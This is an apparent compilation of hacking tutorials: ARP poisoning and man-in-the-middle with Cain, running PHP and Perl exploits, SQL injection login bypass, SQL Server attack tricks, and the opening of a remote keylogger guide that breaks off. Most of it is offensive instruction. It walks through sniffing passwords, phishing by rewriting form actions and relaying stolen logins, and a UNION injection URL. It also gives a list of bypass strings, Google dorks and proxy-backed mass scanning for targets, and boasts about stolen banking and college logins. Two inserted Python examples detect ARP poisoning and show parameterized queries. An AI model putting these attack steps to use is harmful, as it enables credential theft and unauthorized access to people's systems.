Basics ARP Poison routing

Introduction

This paper will lay out for you the basics of an ARP Poison Routing (APR) attack and Man in the Middle (Mitm) attacks. These are very simple attacks, but can be very powerful on unsecured networks. These attacks are so easy I could provide you a walkthrough of how to do this in Cain in about one paragraph, but you wouldn’t learn anything and would become a skiddy.

Before reading this, I suggest you learn a little about networks and the OSI 7-layer model (http://www.webopedia.com/quick_ref/OSI_Layers.asp) and media access control (MAC) addresses, as these attacks take advantage of protocols that work on OSI layers other than what you are usually used to (ie, HTTP on layer 7 and TCP on layer 4, whereas ARP works on layer 2) and do not use only IP addresses for identifying computers.

Address Resolution Protocol:
The Address Resolution Protocol (ARP) is a layer 2 protocol that maps IP addresses to hardware MAC addresses. When a computer wants to find another computer on its network, it uses ARP to identify where that computer is and how to reach it. There are 9 types of ARP packets, but only 4 are relevant here:

1. ARP – What MAC has this IP address?
2. ARP Response – This MAC has this IP address.
3. RARP – What IP has this MAC address?
4. RARP Response – This IP has this MAC address.
If you are trying to contact a computer on another network (i.e., over the internet) then ARP is used to contact your border gateway and route packets to it. The gateway is then responsible for routing the packets to the desired network using IP addresses and various routing protocols instead of ARP. Once the packet has arrived at the correct network, the router that received it will then use ARP again to route the packet around the network to its final destination.

The address resolution protocol works on a stateless broadcast-request/single-reply communication model. This means that when one computer wants to know the address of another, it broadcasts a request for the address across the whole network in the form “What computer is 123.123.123.123? Tell 00:FF:AC:C5:56:3B”. The computer that has the IP address 123.123.123.123 then sends a directed reply, NOT a broadcast, saying “90:F5:63:CA:BB:32 has 123.123.123.123”. The MAC address in the reply is then added to the local computer’s cache, or if a mapping already exists for either the IP or the MAC, the cache is updated to reflect the new info. The MAC/IP mapping is then used to route traffic around the network.

ARP Poison Routing (APR)
Now that you know the basics of how ARP works, let’s explore some pitfalls in the protocol. As I’ve said before, ARP is a stateless protocol. This means that each computer does not remember the state of its ARP requests/replies, and thus, does not remember if it sent a request or if it is waiting for a reply or has already received a reply to a previous request. So if we send an ARP reply, the host will accept it and alter its cache accordingly, even if the host didn’t send out a request! So if we send a reply to a target computer saying that our MAC address corresponds to the local gateway’s IP, then any traffic coming out of the target computer bound for the internet will be instead routed to your computer. You can use this to execute a DoS attack and prevent any packets from the target computer reaching the internet or you can sniff the packets for passwords and then pass them on to the real gateway.

The second method is a very effective way of getting sensitive information and is fairly undetectable unless the target is monitoring their ARP cache constantly. APR can be set up with either 1-way or 2-way poisoning. 1-way poisoning will only poison the cache of a single target and will only intercept traffic coming from that computer, as shown below:
Figure 1: 1-way APR
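The following Python example is added here and is not part of the original paper. It works through the ARP model just described (broadcast request, directed reply, cache update) from the defender's side, as the kind of monitor a host or IDS would run over a capture: it keeps its own IP-to-MAC table, notes replies nobody asked for, reports an existing binding changing, reports one MAC ending up with two IPs (the 2-way poison signature), and reports one MAC asking for every address in the subnet (the sweep that host discovery produces). It also models the static-cache mitigation mentioned in the conclusions: a pinned entry is never overwritten, the conflicting reply is only logged. The packets and addresses are constructed sample data, not a real capture.

```python
from dataclasses import dataclass, field
from typing import NamedTuple


class ArpPacket(NamedTuple):
    """Constructed, simplified view of one ARP packet (what a capture tool shows)."""
    ts: float          # seconds since capture start
    op: str            # "request" or "reply"
    sender_mac: str
    sender_ip: str
    target_mac: str    # broadcast in a request, the asker's MAC in a reply
    target_ip: str


@dataclass
class ArpMonitor:
    """Tracks IP->MAC bindings seen on the wire and flags the symptoms of ARP poisoning."""
    static: dict = field(default_factory=dict)      # pinned ip -> mac (the 'static cache' mitigation)
    sweep_threshold: int = 8                         # distinct IPs one MAC may ask for before it is a sweep
    table: dict = field(default_factory=dict)       # ip -> mac learned from replies
    pending: set = field(default_factory=set)       # (asker_ip, wanted_ip) requests still unanswered
    asked: dict = field(default_factory=dict)       # mac -> set of IPs it has requested
    reported: set = field(default_factory=set)      # (kind, mac) already alerted, to avoid repeats
    alerts: list = field(default_factory=list)

    def feed(self, p: ArpPacket) -> None:
        if p.op == "request":
            self.pending.add((p.sender_ip, p.target_ip))
            wanted = self.asked.setdefault(p.sender_mac, set())
            wanted.add(p.target_ip)
            if len(wanted) >= self.sweep_threshold and ("sweep", p.sender_mac) not in self.reported:
                self.reported.add(("sweep", p.sender_mac))
                self.alerts.append(("arp-sweep", p.sender_mac, len(wanted), p.ts))
            return
        # A reply says "sender_mac has sender_ip" and is addressed to target_ip. ARP is stateless,
        # so the receiving host accepts it either way; we at least record whether it was asked for.
        if (p.target_ip, p.sender_ip) in self.pending:
            self.pending.discard((p.target_ip, p.sender_ip))
        else:
            self.alerts.append(("unsolicited-reply", p.sender_ip, p.sender_mac, p.ts))
        pinned = self.static.get(p.sender_ip)
        if pinned is not None and pinned != p.sender_mac:
            # Static entry: the binding is kept, the attempt is only reported.
            self.alerts.append(("rejected-static-conflict", p.sender_ip, p.sender_mac, p.ts))
            return
        old = self.table.get(p.sender_ip)
        if old is not None and old != p.sender_mac:
            self.alerts.append(("mac-changed", p.sender_ip, f"{old}->{p.sender_mac}", p.ts))
        self.table[p.sender_ip] = p.sender_mac
        # One MAC now answering for two or more IPs is what a 2-way poison looks like in the table.
        claimed = sorted(ip for ip, mac in self.table.items() if mac == p.sender_mac)
        if len(claimed) > 1 and ("multi", p.sender_mac) not in self.reported:
            self.reported.add(("multi", p.sender_mac))
            self.alerts.append(("mac-claims-multiple-ips", p.sender_mac, claimed, p.ts))


# Made-up addresses for the constructed capture below.
GW_MAC, GW_IP = "aa:bb:cc:00:00:01", "10.0.0.1"
VIC_MAC, VIC_IP = "aa:bb:cc:00:00:20", "10.0.0.20"
ATK_MAC, ATK_IP = "aa:bb:cc:00:00:66", "10.0.0.66"
BCAST = "ff:ff:ff:ff:ff:ff"


def sample_capture():
    """Constructed packet list: a normal exchange, a host-discovery sweep, then a 2-way poison."""
    pkts = [
        ArpPacket(0.0, "request", VIC_MAC, VIC_IP, BCAST, GW_IP),
        ArpPacket(0.1, "reply", GW_MAC, GW_IP, VIC_MAC, VIC_IP),
        ArpPacket(0.2, "request", GW_MAC, GW_IP, BCAST, VIC_IP),
        ArpPacket(0.3, "reply", VIC_MAC, VIC_IP, GW_MAC, GW_IP),
    ]
    # one MAC asks for every address in the subnet in turn
    pkts += [ArpPacket(1.0 + i / 10, "request", ATK_MAC, ATK_IP, BCAST, f"10.0.0.{i}") for i in range(2, 12)]
    # the same MAC then claims the gateway's IP to the victim and the victim's IP to the gateway
    pkts += [
        ArpPacket(5.0, "reply", ATK_MAC, GW_IP, VIC_MAC, VIC_IP),
        ArpPacket(5.1, "reply", ATK_MAC, VIC_IP, GW_MAC, GW_IP),
    ]
    return pkts


def run(pkts, static=None):
    mon = ArpMonitor(static=static or {})
    for p in pkts:
        mon.feed(p)
    return mon


if __name__ == "__main__":
    for a in run(sample_capture()).alerts:
        print(a)
    print("with static gateway entry:")
    for a in run(sample_capture(), static={GW_IP: GW_MAC}).alerts:
        print(a)
```

Gratuitous ARP announcements and DHCP lease changes also produce "unsolicited-reply" and the occasional "mac-changed", so on a real network those two are signals to correlate, while "mac-claims-multiple-ips" and a "mac-changed" on the gateway address deserve a page.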

2-way poisoning effectively puts your computer directly between 2 target computers so that you can intercept network traffic coming from either host, as shown below:
Figure 2: 2-way APR
Some interesting attacks that can be used with APR include DoS attacks, Network sniffing/Packet stealing, and phishing.

DoS attacks can be accomplished using a 1-way poison and by redirecting traffic from a target computer to a gateway that doesn’t exist, so they get ICMP Host Unreachable errors for all their network traffic, or you can redirect it to your computer and simply refuse to forward it to the proper destination. Network sniffing and packet stealing as well as Man in the Middle (Mitm) attacks require a 2-way poisoning scheme. Network sniffing and packet stealing would allow you to steal passwords and hashes that are passed over the network. With the proper filters, you can easily pick out plaintext passwords such as FTP, SMTP, and HTTP form data, and hashes such as AIM, Yahoo Messenger, and SQL. You can even listen in on NetBIOS sessions and Telnet connections. With some simple phishing filters on your APR tool, you can redirect people from one website to one you control that looks the same, where the victim will type in their login info unsuspectingly. This is often useful for grabbing plaintext passwords rather than having to brute force password hashes.
One of the greatest hazards to be aware of when using APR is unintentional DoSing of the target or the entire network: because your computer is most likely NOT a dedicated router, and because the packets must travel all the way up the OSI model, be analyzed by your sniffer, then be repackaged and sent all the way down the OSI model again, your computer cannot handle packet routing as efficiently as a dedicated hardware router.

This costs a great amount of time and CPU cycles and slows down the flow of traffic, which may end up backing up and DoSing the target, the network, your computer, or any combination of the three. This is a serious issue and should not be taken lightly. If you APR a router on a large network, you may have hundreds of thousands of packets going through your computer each second. Another hazard that is of interest to hackers is the fact that proxies cannot effectively be used, because ARP and APR work on layer 2 and proxies work on either layer 5 or 7 (depending on the amount of anonymity used) and usually require traveling outside the network to a proxy server. This may seem like a huge safety issue for a hacker, but there is hope! While IP addresses are difficult to spoof over the internet while keeping traffic flowing to and from your computer, both the IP address and MAC address can be effectively altered on a LAN. Many tools exist for changing your MAC and IP during APR attacks. Cain provides an option to do this under the “Configure” menu item.

Man In The Middle (Mitm) Attacks
Mitm attacks include a range of possible attacks, from DoSing, to sniffing, phishing, and rerouting for SE purposes. Mitm is started with a 2-way APR attack that in effect inserts your computer between 2 targets (often a host and a gateway). You can then begin the real meat of the mitm by using customized programs and packet filters to gain the effect you need.

For a simple sniffing attack, a network sniffer such as Ethereal with an IP or MAC filter applied to only capture packets to or from the target is sufficient. For more advanced attacks like password grabbing and phishing, you need more advanced filters. In the case of grabbing passwords, you need a filter that disassembles the packet to get to the layer 4 data and above, then scans that data for plaintext passwords or hashes such as HTTP POST or GET data, FTP, SMTP, or SQL login info; or you can use a filter to capture an entire NetBIOS, Telnet, or VoIP session to record conversations and gather potentially sensitive information. It is not always desirable to have a password hash, especially when you can get the plaintext password in less time. This is where phishing comes in. Phishing is the art of constructing a website to look exactly like another, then redirecting traffic from the real site to the one you control in the hope that no one will notice and will happily type in their real login info, assuming that everything is as it should be. Great care should be taken in conducting a phishing style attack, and I will offer some pointers and methods later on.

Because mitm attacks are built on the back of an APR attack, all the limitations of an APR attack also apply to a mitm attack. But with the increased complexity of a mitm attack, you must also be aware of further limitations. Using complex filters or packet scanners consumes a lot of CPU cycles and can further increase the risk of unintentional DoSing or breaking of the network. Phishing should be used with care as well, because even the smallest difference between your site and the legitimate one will be noticed by daily users and may raise suspicion.

Phishing
Phishing, as already stated, is making a fake site to fool people into giving you their plaintext passwords and login info. There are several methods for creating a phishing site (phishing lure :D). You can attempt to create your copy site from scratch and code it yourself, but chances are people who use the site regularly would know the difference. Another way would be to copy the source code, images (keeping the directory structure intact), and any stylesheets, JavaScript, or embedded objects, then just make a few small changes to the code. Make sure to change all relative paths to absolute URLs when you do this! If you don’t, a form may not direct to the right page or may produce a 404 error, or an image may not display right, and that will raise suspicion. This method produces a site that looks and behaves nearly identically to the original, but because it is still being hosted on another server under a different domain name, observant users may spot the anomaly and report it. For low profile targets, this method is fast and effective.

The final method I will discuss is how to do it without making a fake site at all. Because you are executing a mitm attack and have full access to every packet that moves to and from the target, you can create a packet filter that will change the ACTION property of a tag, so that when the victim clicks the login button, the data will be sent to a site of your choice where you can log the information. This method may be slightly easier to execute, but it will increase the risk of unintentional DoSing due to the processing power required for the filter.

No matter what method you choose to use, it is almost always a good idea to take the login info that you received from your fake site and pass it on to the real site to log the user on. This makes your attack more hidden and more difficult to detect. When doing this, make sure to catch errors coming back from the real site in case the user entered an invalid password or username. Then pass this information back to the user. This can be done easily and is no big deal to implement, but failing to do so may raise suspicion and may get you caught.

APR with Cain
Most people think of Cain as a simple password hash cracker, but it is actually much more. It is a very powerful network analyzer and password recovery tool as well as a cracker. It can dump protected storages, sniff network connections, enumerate hosts and users as well as network shares, and can even remotely install the backdoor program Abel. Now, on to the good stuff! I will show you a basic password sniffing mitm attack, but first, I assume you have Cain configured properly for your network card. If not, click the “Configure” menu option and read the help files.


Start up Cain and look at the icons along the top, just under the menu. The 2 icons we will be concerned with here are the nuclear symbol (the APR icon) and the small circuit board with a red arrow (the sniffer icon). If you are not sure which icons I am talking about, hover your mouse over them and find the icons for “Start/Stop Sniffer” and “Start/Stop APR”. Click the sniffer icon to start the sniffer. Now go to the sniffer tab. The table shown in this tab provides you with information about computers currently on your network and should be blank. If not, clear it by right clicking and selecting “Remove All”. The most useful columns right now are the first 4: IP Address, MAC Address, OUI Fingerprint, and Host Name.

These should be pretty self explanatory with the exception of the OUI Fingerprint column. When a MAC address is coded into a piece of network hardware, part of the address is used to define the particular computer (like a serial number) and part is used to define the vendor that makes the hardware. Cain has a database of vendors that it checks the MAC address against to discover who made the hardware of that particular host. This is what is contained in the OUI Fingerprint column.

Once the sniffer is started, we need to populate the sniffer tab with host info. Click the “+” button to gather a list of all computers on the current network. If you have Ethereal, you can start it up with “arp” in the filter and watch Cain send out consecutive ARP requests for every IP in your subnet and watch all the computers respond, freely giving away information about themselves. Once we have a list of possible targets, we need to set up an APR attack. Click on the “Start/Stop APR” icon to start the APR poisoner, then click the “APR” tab at the bottom of the “Sniffer” tab window. There are 2 tables in this tab: the top one is hosts on the LAN that you can directly affect; the bottom table is for computers on the WAN, which, depending on the border router’s settings, may or may not be vulnerable to APR. This list is populated as hosts are discovered through analyzing packets.

Select the LAN table, and click the “+” icon again. Now select 2 hosts to insert yourself between. After that’s done, sit back and watch the packets roll in. Check the “Passwords” tab on the bottom for various passwords, or the branches under the “APR” symbol on the main APR tab to get HTTPS certificates and other valuable information. The APR-DNS branch can be used in phishing and in redirecting traffic from a website. Well, that’s it. That’s all there is to spying on people’s network traffic when you have access to a computer on the network, which is quite often if you go war-driving behind main street, picking up all the “insekure” business wi-fis.

Conclusions
On large or sensitive networks, APR and Mitm can be a very effective way of getting valuable information through many means, including packet filters and sniffers, phishing, and traffic rerouting. Some of the overall limitations of ARP poisoning are that it cannot cross routers unless they are set up as a single autonomous unit (AU) and are contained in the same subnet. ARP poisoning can be easily thwarted if static caches are being used. Static caches prevent host caches from being updated remotely via the ARP protocol. Some of the interesting things I have actually been able to get from APR and Mitm include:

- Webmail and SMTP logins
- FTP logins to servers running FTPD as root (w00t!)
- FTP logins to websites (pwnt)
- Admin logins to sites
- Student and teacher account logins to my college (I can change their schedules for next year :D)
- AIM convos/hashes and Telnet/SMB/SSH sessions
- Wardriving behind businesses to take over their networks
- Online banking login info and certificates (free moneys!)
Things I’ve learned from my exploits: SECURE YOUR Network! And DON’T do important things on a public network (library, school). You never know when Big Brother is watching.

Links, References, and Tools
- Cain
- Ettercap
- Ethereal
- ARPoison
- Dsniff
- Parasite
- WinARPSpoofer
- http://en.wikipedia.org/wiki/ARP_spoofing
- http://www.grc.com/nat/arp.htm

Exploiting Basics

There are mainly three different types of exploits that are used on the internet: PHP, Perl and web-based attacks.
PHP and Perl attacks are run on the attacker's own computer through an interpreter, a program that reads the code and runs it. These are usually powered by an underlying SQL or XSS attack.

The other type of attack is a plain web based attack, usually a SQL injection or an XSS exploit with no PHP or Perl powered frontend. These are the easiest to do, but the hardest to figure out how to use as there is not a definitive way of executing them.

General Information

Operating Systems
The most widely used OS is Windows and to be honest I hate it. But I use it. But it is very hard to hack with, as tools are not really created with it in mind. Because of that I recommend Linux as a hacking OS because everything just works.
Oh, yeah, did I mention it's free?

PHP
PHP (PHP: Hypertext Preprocessor) is a computer scripting language, originally designed for producing dynamic web pages. It is mainly used in server-side scripting, but can be used from a command line interface or in standalone graphical applications.
Yes, that's from Wikipedia. But it's helpful and might be interesting.
PHP is a very useful and powerful programming language which is used for diverse projects. Because it's powerful yet simple, it's used for hacking. And, of course, it's free.

How To Spot a PHP Exploit
A PHP exploit is always encased in tags.

Perl
Perl is a dynamic programming language created by Larry Wall and first released in 1987. Perl borrows features from a variety of other languages including C, shell scripting (sh), AWK, sed and Lisp. Perl was widely adopted for its strengths in text processing and lack of the arbitrary limitations of many scripting languages at the time.
Yes, that's from Wikipedia too. But Perl too is a powerful yet simple language, like PHP. And it's free as well.

How To Spot a Perl Exploit
They always start with

#!/usr/bin/perl

Executing Exploits:

Web Based:
These attacks differ hugely so the easiest thing to do is to read the NFO when using this kind of attack.
They usually come in the format

http://www.xxx.org/view.php?id=-1+union+select+1,2,3,convert(concat(database(),char(58),user(),char(58),version()),char),5,6,7,8,9,10,11,12/*

The example is a SQL injection, but XSS attacks look very similar. All text after the view.php? is the sploit. The exploit occurs in the way that the PHP handles the information being sent by the HTML.
To use these you just paste everything from http://www.xxx.org/ onwards into the browser address bar while on the vulnerable page of the website.
For example: I am on the forums of a website at www.somewebsite.org/forums/. I know the exploit is in the format above. But I know that the vulnerable part of the site is in the /forums/ subdirectory, so I paste the exploit there:

www.somewebsite.org/forums/view.php?id=-1+union+select+1,2,3,convert(concat(database(),char(58),user(),char(58),version()),char),5,6,7,8,9,10,11,12/*

You can take this principle and apply it to XSS exploits as well.

To use a script you do not need to know SQL, but if you want to develop your own exploits it helps a great deal. Look here for more information: http://www.w3schools.com/sql/default.asp

PHP on Windows:
To run PHP on Windows, you need the PHP software. It is open source and so free to download.
http://www.php.net/downloads.php
Download the latest version of the Windows binary installer and the zipped folder.

Run the installer, install it into C:\PHP, and choose not to configure a web server. Next, open the zip and extract everything into the same folder. Rename php.exe to php2.exe or php.exe.bak. Now copy the php.exe from the C:\PHP\CLI folder to C:\PHP.

Right-click My Computer and pick Properties. Click the Advanced tab, then Environment Variables at the bottom. In the second list box you’ll see a line for PATH. Double-click it and add “;C:\PHP” to the end of the existing line. This should give you something like:
Code:

C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;
C:\Program Files\Command;C:\PHP

Click OK.

Now open a Command Prompt and type the following lines:

ASSOC .php=PHPScript
FTYPE PHPScript="C:\PHP\PHP.EXE" "%1" %*

You can now just type a PHP script name to run it like an EXE in Command Prompt. No need to type PHP first. For example:
Code:

C:\>phpscript.php

Now that you have the PHP environment set up, save the exploit to your computer as a .php file. The easiest way to do this is to paste everything from the into Notepad. Then File -> Save As, set the file type to All Files, and type exploit.php as the file name.

Read through the php file before running as often you need to define (change) the variables which are used throughout the exploit, such as the website name. These are always at the top of the program and look like:

$target = 'http://localhost/cutenews.1.4.5/search.php';
$username = 'waraxe'; // Username is needed
$outfile = './cute_log.txt';// Log file

The text after // is a comment (the // inside the web address is part of the URL, not a comment). This is so the programmer can give you information about what to do within the source code. Always read these, as they give useful information.

Change the text within the '....' to the information relevant to the site that you are exploiting.

Finally you can run it from the command prompt by navigating to the directory that you saved the exploit.php file in:

C:\> cd C:\your\dir\goes\here

and then run the exploit

C:\your\dir\goes\here> exploit.php

The output of your exploit, such as passwords, will be shown in the command prompt.

You're done.

PHP on Linux (Debian/Ubuntu):
Firstly, become root. Then install PHP.

apt-get install php5

Then save the exploit as exploit.php to your home directory. The exploit is everything within .

Read through the php file before running as often you need to define (change) the variables which are used throughout the exploit, such as the website name. These are always at the top of the program and look like:

$target = 'http://localhost/cutenews.1.4.5/search.php';
$username = 'waraxe'; // Username is needed
$outfile = './cute_log.txt';// Log file

The text after // is a comment (the // inside the web address is part of the URL, not a comment). This is so the programmer can give you information about what to do within the source code. Always read these, as they give useful information.

Change the text within the '....' to the information relevant to the site that you are exploiting.

Finally, run the php file.

php exploit.php

The output of your exploit, such as passwords, will be shown in the command prompt.

You're done.

Perl on Windows:
Perl is very similar to PHP in the way that it's run, but thanks to good software, it is a lot easier to execute.

Download Strawberry Perl from: http://strawberryperl.com/
Just install it and you are able to run Perl files by executing on the command line:

perl exploit.pl

Read through the perl file before running as often you need to define (change) the variables which are used throughout the exploit, such as the website name. These are always at the top of the program and look like:

$target = "http://localhost/cutenews.1.4.5/search.php";
$username = "waraxe"; # Username is needed
$outfile = "./cute_log.txt"; # Log file

The text after the # is a comment (apart from the web address). This is so the programmer can give you information about what to do within the source code. Always read these, as they give useful information.

Change the text within the "...." to the information relevant to the site that you are exploiting.

Finally run the exploit by typing into the command line:

perl exploit.pl

The output of your exploit, such as passwords, will be shown in the command prompt below.

You're done.

Perl on Linux (Debian/Ubuntu):
Become root and install Perl:

apt-get install perl

You are then able to run Perl files by executing:

perl exploit.pl

Save the Perl exploit to your home directory as exploit.pl.

Read through the Perl file before running, as often you need to define (change) the variables which are used throughout the exploit, such as the website name. These are always at the top of the program and look like:
Code:

$target = "http://localhost/cutenews.1.4.5/search.php";
$username = "waraxe"; # Username is needed
$outfile = "./cute_log.txt"; # Log file

The text after the # is a comment (apart from the web address). This is so the programmer can give you information about what to do within the source code. Always read these, as they give useful information.

Change the text within the "...." to the information relevant to the site that you are exploiting.

Finally run the exploit by typing:

perl exploit.pl

The output of your exploit, such as passwords, will be shown in the command prompt below.

What is SQL Injection and How to do It

One of the major problems with SQL is the poor security surrounding the login and URL strings.
This tutorial is not going to go into detail on why these strings work, as I am not a coder; I just know what I know, and it works.

SEARCH:

admin\login.asp
login.asp

With these two search strings you will have plenty of targets to choose from... finding one that's vulnerable is another question.


INJECTION STRINGS:HOW ?

This is the easiest part... very simple.

On the login page just enter something like:

user: admin (you don't even have to put this.)
pass:' or 1=1--

or

user:' or 1=1--
admin:' or 1=1--

Some sites will have just a password, so:

password:' or 1=1--

In fact I have compiled a combo list with strings like this to use on my chosen targets.... There are plenty of strings about; the list below is a sample of the most commonly used.

There are many other strings involving, for instance, UNION table access via reading the error pages' table structure;
thus an attack with this method will eventually reveal admin U\P paths... but that's another paper.

The ones I am interested in are quick access to targets.

PROGRAM

I tried several programs to use with these search strings and up to now only Ares has performed well, with quite a bit
of success with a combo list formatted this way. Yesterday I loaded 40 eastern targets with 18 positive hits in a few minutes.
How long would it take to go through 40 sites cutting and pasting each string??

combo example:

admin:' or a=a--
admin:' or 1=1--

and so on... It doesn't have to be admin, it can be anything you want... The most important part is, for example, ' or 1=1-- this is our injection
string.

Now the only trudge part is finding targets to exploit... so I tend to search, say, Google for login.asp or whatever:

inurl:login.asp
index of:/admin/login.asp

Like this: index of login.asp

result:

http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search

17,000 possible targets; trying various searches spews out plenty more.


Now, using proxies set in my browser, I then click through interesting targets... seeing what's what on the site pages; if interesting,
I then cut and paste the URL as a possible target... After an hour or so you have a list of potential target sites like so:

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

and so on... In a couple of hours you can build up quite a list... The reason I don't select all results or spider for login pages is
I want to keep the noise level low... my ISP.. well, enough said... plus atm I am on dial-up, so too slow for me.

I then save the list, fire up Ares and enter (1) a proxy list, (2) my target IP list, (3) my combo list... start.. Now I don't want to go into
problems with users using Ares.. thing is, I know it works for me...

Sit back and wait... any vulnerable target will show up in the hits box... Now when it finds a target it will spew all the strings on that site as vulnerable... you have to go through each one on the site by cutting and pasting the string till you find the right one.. but the thing is, you know you CAN access the site... Really I need a program that will return the hit with a click on the URL and ignore false outputs.

I am still looking.... thing is, it saves quite a bit of time going to each site and each string to find it's not exploitable.

There you go, you should have access to your vulnerable target by now.

Another thing: you can use the strings in URLs where user=? Edit the URL to the = part and paste ' or 1=1-- so it becomes

user=' or 1=1-- just as quick as the login process.


(Variations)

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

Happy hunting.
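All of the strings listed above work the same way: the quote closes the string literal the application built around the user's input, and whatever follows becomes part of the WHERE clause (a trailing -- comments out the rest). The following Python example is added here and is not part of the original post. It uses an in-memory SQLite table with constructed sample data to run a few of the listed strings against a login query built by string concatenation, and against the same query using bound parameters, which is the fix. It also shows that which strings "work" depends on the shape of the query and on the database dialect: the ') variant expects a query wrapped in parentheses, and # is a comment in MySQL but not in SQLite, so both produce a syntax error here instead of a bypass.

```python
import sqlite3

# Constructed sample data. A real application would store a password hash, not the password;
# the plaintext column keeps the demonstration focused on the query construction.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse battery staple')")
    return conn


def vulnerable_login(conn, username, password):
    """The bug: user input is pasted straight into the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def safe_login(conn, username, password):
    """The fix: placeholders are bound as values, so quotes in the input are just data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# (username, password) pairs taken from the strings in the post; "anything" is a constructed filler.
ATTEMPTS = [
    ("admin", "' or 1=1--"),
    ("' or 1=1--", "anything"),
    ("admin'--", "anything"),
    ("admin", "' or 'x'='x"),
    ("admin", "') or ('x'='x"),
    ("admin", "' or 0=0 #"),
]


def classify(conn, login, username, password):
    """Returns 'bypass' if the login succeeds, 'denied' if not, 'error' if the SQL fails to parse."""
    try:
        return "bypass" if login(conn, username, password) else "denied"
    except sqlite3.Error:
        return "error"


def compare(attempts=ATTEMPTS):
    """Maps each (username, password) to (result with concatenation, result with parameters)."""
    conn = make_db()
    return {
        (u, p): (classify(conn, vulnerable_login, u, p), classify(conn, safe_login, u, p))
        for u, p in attempts
    }


if __name__ == "__main__":
    for (u, p), (vuln, safe) in compare().items():
        print(f"user={u!r:16} pass={p!r:16} concatenated={vuln:7} parameterized={safe}")
```

The parameterized version never errors and never bypasses, which is the property to look for in code review: the query text is constant and the input only ever reaches the database as a bound value.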

Top 10 Tricks to exploit SQL Server Systems

Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.

1. Direct connections via the Internet

These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield's Port Report shows just how many systems are sitting out there waiting to be attacked. I don't understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.

2. Vulnerability scanning

Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.'s NGSSquirrel for SQL Server (for database-specific scanning). They're easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.


Figure 1: Common SQL injection vulnerabilities found using WebInspect.

3. Enumerating the SQL Server Resolution Service

Running on UDP port 1434, this allows you to find hidden database instances and probe deeper into the system. Chip Andrews' SQLPing v 2.5 is a great tool to use to look for SQL Server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren't listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.

4. Cracking SA passwords

Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS Software Ltd. also have this capability.

5. Direct-exploit attacks

Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access.


Figure 2: SQL Server vulnerability exploitable using Metasploit's MSFConsole.

6. SQL injection

SQL injection attacks are executed via front-end Web applications that don't properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informative errors, cause commands to be executed and more. These attacks can be carried out manually -- if you have a lot of time. Once I discover that a server has a potential SQL injection vulnerability, I prefer to perform the follow-through using an automated tool, such as SPI Dynamics' SQL Injector, shown in Figure 3.

Figure 3: SPI Dynamics' SQL Injector tool automates the SQL injection process.

7. Blind SQL injection

These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn't receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that's where Absinthe, shown in Figure 4, comes in handy.

Figure 4: Absinthe tool takes the pain out of blind SQL injection testing.

8. Reverse engineering the system

The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you'll find a discussion about reverse engineering ploys.

9. Google hacks

Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors -- such as "Incorrect syntax near" -- leaking from publicly accessible systems. Several Google queries are available at Johnny Long's Google Hacking Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google's 'site:' operator often turns up juicy info you never imagined you could unearth.

10. Perusing Web site source code

Source code can also turn up information that may lead to a SQL Server break-in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or a Google search could uncover this information in a split second.

Installing a Keylogger on a Remote Machine

Note: This article is for educational purpose only and the author won’t be responsible for any kind of damage caused by following the information given in this article

Now, to install a keylogger on a remote computer you have to follow the steps given below:

First of all, download the Winspy keylogger software from the link given below:

